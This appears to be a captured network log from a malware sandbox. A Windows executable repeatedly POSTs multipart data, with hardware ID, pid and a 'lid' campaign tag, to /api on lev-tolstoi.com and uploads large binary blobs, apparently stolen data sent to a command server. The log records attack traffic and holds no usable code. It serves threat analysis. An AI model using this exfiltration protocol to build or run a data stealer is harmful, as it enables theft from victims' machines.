                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K%2Ffc5M0ZfirQGPr6REOSSt%2FzHD94un6Jrf6Lm4c5MJi0JrPteVQfp8eUCpUBzHmVjPAeOB2YVrOTv7o%2FcNUI8%2F9LTPFV4ElFmg7ADSwXc71JVBXyT7oH0fOmiLU9Z%2FIWuWw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f902f3dab39de99-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1468&rtt_var=574&sent=14&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13779&delivery_rate=1867007&cwnd=209&unsent_bytes=0&cid=8322fd791422c21c&ts=826&x=0"
                                                                                                                                                                                                                                                              2024-12-28 08:29:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-28 08:29:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              4192.168.2.1049704172.67.157.2544438048C:\Users\user\Desktop\hx0wBsOjkQ.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-28 08:29:48 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=J41QSBOU
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 15014
                                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                                              2024-12-28 08:29:48 UTC15014OUTData Raw: 2d 2d 4a 34 31 51 53 42 4f 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 41 42 43 38 35 38 30 42 37 41 45 39 37 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4a 34 31 51 53 42 4f 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 34 31 51 53 42 4f 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4a 34 31 51 53 42 4f 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                                                                                                                                                                                                                              Data Ascii: --J41QSBOUContent-Disposition: form-data; name="hwid"5DABC8580B7AE972BEBA0C6A975F1733--J41QSBOUContent-Disposition: form-data; name="pid"2--J41QSBOUContent-Disposition: form-data; name="lid"PsFKDg--pablo--J41QSBOUContent-Disposit
                                                                                                                                                                                                                                                              2024-12-28 08:29:49 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:29:49 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=vbtah4th10ku68t5ipog9rlff0; expires=Wed, 23 Apr 2025 02:16:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8J3VTGsYfv3UVsEkAs%2FlDr4Q77IfjH2XNp6ZUYL%2FSr2%2B667x2K9NWm6NAqQGWHF5psHl3JKvGnHhEceGKm4HPMWOs7fiQ95TAec1NtKlN9n834uXmbW9Abl1vsUlJdUNsNo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f902f4b2d0b437a-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2390&min_rtt=2384&rtt_var=906&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15943&delivery_rate=1199671&cwnd=223&unsent_bytes=0&cid=8c4327bc76e33649&ts=1143&x=0"
                                                                                                                                                                                                                                                              2024-12-28 08:29:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-28 08:29:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              5192.168.2.1049705172.67.157.2544438048C:\Users\user\Desktop\hx0wBsOjkQ.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-28 08:29:51 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=SCT42TTR89
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 20388
                                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                                              2024-12-28 08:29:51 UTC15331OUTData Raw: 2d 2d 53 43 54 34 32 54 54 52 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 41 42 43 38 35 38 30 42 37 41 45 39 37 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 53 43 54 34 32 54 54 52 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 53 43 54 34 32 54 54 52 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 53 43 54 34 32 54 54 52 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                                                                                                                                              Data Ascii: --SCT42TTR89Content-Disposition: form-data; name="hwid"5DABC8580B7AE972BEBA0C6A975F1733--SCT42TTR89Content-Disposition: form-data; name="pid"3--SCT42TTR89Content-Disposition: form-data; name="lid"PsFKDg--pablo--SCT42TTR89Content-
                                                                                                                                                                                                                                                              2024-12-28 08:29:51 UTC5057OUTData Raw: 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 60 7e c3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 5c 5f f0 2b b1 64 f0 7c 3c 78
                                                                                                                                                                                                                                                              Data Ascii: lpQ0/74G6(~`~O\_+d|<x
                                                                                                                                                                                                                                                              2024-12-28 08:29:52 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:29:51 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=b6uoqepbrv69ofbqrpf2c2httc; expires=Wed, 23 Apr 2025 02:16:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lUw6A%2FLPKeU72iMp5W7uOJnTA16EevsFW76il4aUvAhKey%2FZyI0GmShHsdcOdsJBR0wjrt%2FifsYybsEyjHocTgoaS9Ik4cRPbjPezY44adHpl5gdwA3qwJ1V0flwwxeZ%2BbY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f902f5b7f0cde99-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1542&rtt_var=613&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21341&delivery_rate=1736028&cwnd=209&unsent_bytes=0&cid=3fc04833e3136340&ts=958&x=0"
                                                                                                                                                                                                                                                              2024-12-28 08:29:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-28 08:29:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              6192.168.2.1049707172.67.157.2544438048C:\Users\user\Desktop\hx0wBsOjkQ.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-28 08:29:54 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=V7XJLHITGPCI
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 1210
                                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                                              2024-12-28 08:29:54 UTC1210OUTData Raw: 2d 2d 56 37 58 4a 4c 48 49 54 47 50 43 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 41 42 43 38 35 38 30 42 37 41 45 39 37 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 56 37 58 4a 4c 48 49 54 47 50 43 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 37 58 4a 4c 48 49 54 47 50 43 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 56 37 58 4a 4c 48 49 54 47 50 43 49 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: --V7XJLHITGPCIContent-Disposition: form-data; name="hwid"5DABC8580B7AE972BEBA0C6A975F1733--V7XJLHITGPCIContent-Disposition: form-data; name="pid"1--V7XJLHITGPCIContent-Disposition: form-data; name="lid"PsFKDg--pablo--V7XJLHITGPCI
                                                                                                                                                                                                                                                              2024-12-28 08:29:55 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:29:55 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=doqr0hvsirmo4k876lom1uvmo6; expires=Wed, 23 Apr 2025 02:16:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fdZJDH83HzW4k0XewwZUqqnj%2BY%2BluItH9VRMV1bcnG%2Ff3OTlZxLyfoaw1MN5yi3KdXx3JMBFtEsq%2BT7tkCJdb7Bjp3drLY%2FXinPP9osOf0fs2aOah41IcKHvyFkqyxXyb%2B4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f902f709e544263-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1650&rtt_var=633&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2120&delivery_rate=1709601&cwnd=247&unsent_bytes=0&cid=1ebe65d88f06af04&ts=880&x=0"
                                                                                                                                                                                                                                                              2024-12-28 08:29:55 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-28 08:29:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              7192.168.2.1049710172.67.157.2544438048C:\Users\user\Desktop\hx0wBsOjkQ.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-28 08:29:57 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=L4TJPNUKPYCP0
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 568342
                                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                                              2024-12-28 08:29:57 UTC15331OUTData Raw: 2d 2d 4c 34 54 4a 50 4e 55 4b 50 59 43 50 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 41 42 43 38 35 38 30 42 37 41 45 39 37 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4c 34 54 4a 50 4e 55 4b 50 59 43 50 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 34 54 4a 50 4e 55 4b 50 59 43 50 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4c 34 54 4a 50 4e 55 4b 50 59 43
                                                                                                                                                                                                                                                              Data Ascii: --L4TJPNUKPYCP0Content-Disposition: form-data; name="hwid"5DABC8580B7AE972BEBA0C6A975F1733--L4TJPNUKPYCP0Content-Disposition: form-data; name="pid"1--L4TJPNUKPYCP0Content-Disposition: form-data; name="lid"PsFKDg--pablo--L4TJPNUKPYC
                                                                                                                                                                                                                                                              2024-12-28 08:29:57 UTC15331OUTData Raw: 0c 3b c0 08 1d b7 2d cb ae 1c 92 51 84 a9 db b6 4a d4 90 01 f8 31 35 22 e1 8b 21 53 b0 43 d2 73 2f 17 fe e0 51 6b 7a b0 c2 5b 3c 7c 59 ca 34 c3 3e 4b 20 e5 1a 35 61 ca 1a e4 a8 6f 2d 5b db 44 9e df 8f 62 a5 b7 72 47 de 17 26 6e 86 e5 a3 c3 e2 36 04 67 39 c9 8c e8 ea 07 c1 44 bc aa 0b e2 b0 42 6f 6f 4c ea 53 d3 78 ad be 1a 3d 45 51 2b 57 01 9b db cc 22 f1 09 3b b8 e3 ce 81 4f 6b 05 fe 4b bf 8b b6 ca 85 ac 9d e7 c4 b8 76 e2 07 91 96 a6 dd fc 27 3c 81 39 0e de f9 bd ae 58 2f 8e 56 d0 24 a9 f2 70 44 d9 fb 24 5b 06 34 06 3f 50 74 05 a1 4d fc d6 ee d9 77 87 00 c5 98 32 d0 14 f8 6f 53 b8 14 67 57 df 08 3f 55 17 4c 10 77 62 ce 48 90 ff 3e c2 d3 ef 2c 0c ea b1 92 a3 5b ee 3a cd 1f f4 13 38 d7 c5 c9 17 21 32 eb 78 9f e3 1d 09 c6 be 18 d8 47 74 92 9f 3a 87 6a 19 5b
                                                                                                                                                                                                                                                              Data Ascii: ;-QJ15"!SCs/Qkz[<|Y4>K 5ao-[DbrG&n6g9DBooLSx=EQ+W";OkKv'<9X/V$pD$[4?PtMw2oSgW?ULwbH>,[:8!2xGt:j[
                                                                                                                                                                                                                                                              2024-12-28 08:29:57 UTC15331OUTData Raw: bb ae b3 c3 af 05 18 f4 73 5e be 98 c0 6a 6d ed af 9e 78 f9 e4 fb 9f 27 10 70 7e e7 87 a5 0d f8 6f a1 27 9e ed 6a b6 e6 81 b5 fa fc 4c 83 d6 97 df fc f0 7e 99 96 fe 34 60 f8 a6 1c 9b 33 df b1 f4 7d 2e 75 2e 6e be 53 f0 6f bb cd bf 4e 31 42 64 24 e6 b4 50 c1 71 15 9a 50 e0 5f b1 c3 c1 ab 55 c1 81 1b ad de 12 5d cc 41 3e e7 8d bd 9e 33 45 03 49 7b 6b b5 46 46 1e dc 3b be 95 93 03 16 07 a4 03 4f 84 33 de c8 02 ed 19 f6 92 01 6d c3 05 43 7d 10 63 dd c4 61 47 cf 1b 88 7a ee b6 6c d4 10 f1 2c b8 63 c2 29 bb 8a 06 fb 9f 4b f3 4a 4a a2 23 0e 77 7a a2 eb 33 51 0d 43 29 12 da 8a 4a f5 3f ba ee 4d f5 75 26 cc e9 08 68 91 9f ff 5b c4 38 a2 21 d3 5e 90 e1 78 4d e0 9c a4 4b e7 b8 bd 3a ac fd 0f 95 08 0a b6 95 a0 f9 b2 c0 37 50 7f 0e 1e b2 b8 0c 95 a2 f0 7a 58 58 0d df
                                                                                                                                                                                                                                                              Data Ascii: s^jmx'p~o'jL~4`3}.u.nSoN1Bd$PqP_U]A>3EI{kFF;O3mC}caGzl,c)KJJ#wz3QC)J?Mu&h[8!^xMK:7PzXX
                                                                                                                                                                                                                                                              2024-12-28 08:29:57 UTC15331OUTData Raw: 7b 74 de 0d 73 23 41 ea e9 c3 d6 2a a0 e7 87 33 e5 85 10 98 eb 23 9f 00 c4 17 b0 14 99 4d 7b d0 63 2d c5 79 b3 ab 1d 56 f3 21 0a 2b 08 02 dc cc 3c 30 2c 67 b4 13 85 dc d3 6f 8e e8 69 c0 ab 23 46 d2 f1 34 53 75 44 4e c9 61 7d 01 f8 33 0a 5e 10 bc b3 a0 4a c8 30 32 cc 08 82 ac 0b 00 4b d8 b1 23 4d 93 11 56 b8 ae 52 c4 e7 4a 04 3f 5f c0 eb ac 8c e5 dc 7f 3d 02 b8 66 5d ea f1 21 e4 c3 f5 48 34 ae 79 54 e4 de bf 44 23 91 14 0d 5a 5a bf ad 99 22 4d 69 92 33 92 1e ab 6c 7c 8b 0f 37 92 f5 cd 9c f6 57 95 c6 aa 8d 71 43 e5 91 26 0f 59 c4 cb d0 14 dc e9 33 93 52 9d ff 61 03 c0 11 be 16 cf 4b 73 06 8a 98 6d 7d 12 a3 c7 73 ad fb 71 f8 f4 00 0f 8f de be 3e 05 bf 5c d8 b0 05 6d 8f f0 74 8a 98 db ba 5d df 65 b4 ce 67 aa 73 e9 e1 3c 72 c3 79 76 d5 1d 62 cd 94 06 41 7f ef
                                                                                                                                                                                                                                                              Data Ascii: {ts#A*3#M{c-yV!+<0,goi#F4SuDNa}3^J02K#MVRJ?_=f]!H4yTD#ZZ"Mi3l|7WqC&Y3RaKsm}sq>\mt]egs<ryvbA
                                                                                                                                                                                                                                                              2024-12-28 08:29:57 UTC15331OUTData Raw: 16 2a b3 31 13 04 da 13 b8 d1 81 8e 5b 22 65 90 77 49 f7 b7 56 f6 8b 68 3b 2f d4 87 25 15 4d be 84 60 de 5d cc c9 94 8a da 93 b2 28 8a df 6f f7 82 f6 d7 b1 e0 58 d4 6d b9 c5 33 d2 3b ed 98 ae d7 1d 3f 55 df 7a 5a e6 00 cb 8e f7 3b 02 f3 25 72 46 ac d3 99 8c f0 37 64 b6 55 a2 74 fa f2 13 eb fb b4 0a 8a 41 29 52 7f d5 e8 ef aa 22 98 a9 b9 49 2c 25 5d 24 2f a5 cd 90 bb 16 5a 4c 37 4f c8 79 d2 3a e7 c9 8f 1e ab ca 29 1b b4 fb 37 ae 41 2f 60 ec aa 4a 11 32 5c 39 db 4b 21 4c 0a 5c 16 30 1d f5 f3 87 9d c3 5a b7 a7 a1 00 3f a7 40 30 a5 98 b3 a4 d8 dd b3 9d 5f 48 30 df d9 4c c7 29 b9 47 c1 67 bd 28 7a e9 d2 70 e8 d8 46 b7 6c d4 a9 c4 cf 6f 8c a8 0d e1 07 25 72 a6 85 d3 7d f7 17 c6 fd da 8a 44 fd 3a f2 6f f8 8f 2f 5a 52 18 0d 99 ff 77 3b a6 df 06 54 43 18 c5 42 01
                                                                                                                                                                                                                                                              Data Ascii: *1["ewIVh;/%M`](oXm3;?UzZ;%rF7dUtA)R"I,%]$/ZL7Oy:)7A/`J2\9K!L\0Z?@0_H0L)Gg(zpFlo%r}D:o/ZRw;TCB
                                                                                                                                                                                                                                                              2024-12-28 08:29:57 UTC15331OUTData Raw: 33 63 d2 68 aa 83 80 c0 05 71 42 11 2f d1 06 8b 2d e9 13 ea c7 01 6e e1 a8 95 36 48 ec 56 81 15 26 ab a3 bb eb 92 52 00 84 d8 12 3e 41 d1 a1 92 71 e0 7d 9d ca ad 7c ce 8d 83 d8 22 62 6b 54 e5 ee b5 62 b9 0c 74 70 cc ad b2 eb 7d 3e 3a bf 6f 93 4a 80 a2 d8 1e 66 9b 3a 49 99 0d 56 ac 16 72 27 b2 fc 14 ca 77 8c ce 11 75 35 a0 da c2 61 c6 3d 88 31 91 19 50 13 b1 93 96 78 43 fa 4d 64 50 f4 e7 cb ca 7b 2a 6a 77 7e b8 5f de 10 35 ae b8 e3 9f e9 db b5 e8 af 7e c2 cd bd 7e a8 26 c1 c0 e4 16 f2 46 15 4e be 38 d3 50 d1 97 5b 7e 74 dd 12 f7 fc 3d 1d ae 29 99 0a 15 85 b1 84 29 56 e3 3d 8c e0 9e 2d fb 05 71 57 ac d8 53 28 8f c1 d7 f2 9d 9b 5e ff 6f 44 7f bd 5d 39 58 74 d2 ba 12 1b 4d 29 eb 0a b9 21 d2 9d fd 5d e3 b6 67 a6 fd 9f b9 1e de 84 78 d5 ce 87 cf 93 37 82 89 39
                                                                                                                                                                                                                                                              Data Ascii: 3chqB/-n6HV&R>Aq}|"bkTbtp}>:oJf:IVr'wu5a=1PxCMdP{*jw~_5~~&FN8P[~t=))V=-qWS(^oD]9XtM)!]gx79
                                                                                                                                                                                                                                                              2024-12-28 08:29:57 UTC15331OUTData Raw: 0a 49 65 b4 ee e1 db 17 63 2f a4 e9 76 bc 80 7c 01 14 4b e0 df 8a 12 de 72 5e 8f 60 2f fd 1e 2a e0 e4 fd e1 50 45 74 95 d1 94 5a 19 7a a3 f4 d4 d1 76 f0 17 3f 76 86 f1 65 ad 9a 54 78 88 eb 5f 79 fe 4b 8e 76 ea 0e fd 53 c5 f2 85 48 69 d5 0a bd 07 da 58 cf 65 be 10 7e 01 04 b6 66 d3 ee b4 73 94 e5 51 9d 05 4b 09 51 fd b1 71 4c a7 68 ae 3f 52 f4 c5 11 d7 ff ee 94 3d a1 1e c0 f7 3c 11 b9 0b 1b 29 8a a5 5f 7d 67 3b 67 cf 75 f4 05 69 7e 9a 10 fa dd 71 63 60 d8 da c2 e6 5e b6 b3 b1 e3 e9 47 5c 28 9f 9e 07 93 e3 87 3b 14 54 ed b7 bf db f2 a1 1c bf 8c bf be d9 a6 73 e9 8f a5 8f a7 e3 1b e6 a4 73 4e e9 e7 0b a5 e0 c3 ad 5a 47 e7 d7 41 11 c6 03 35 f4 4b a6 d1 8a 76 55 3d cf 4b fe b1 fe fc c6 7e 55 b6 ae 4b 51 23 f8 dd 94 b0 cf 9a f5 aa 14 c4 5d f2 42 24 8b c4 4f 68
                                                                                                                                                                                                                                                              Data Ascii: Iec/v|Kr^`/*PEtZzv?veTx_yKvSHiXe~fsQKQqLh?R=<)_}g;gui~qc`^G\(;TssNZGA5KvU=K~UKQ#]B$Oh
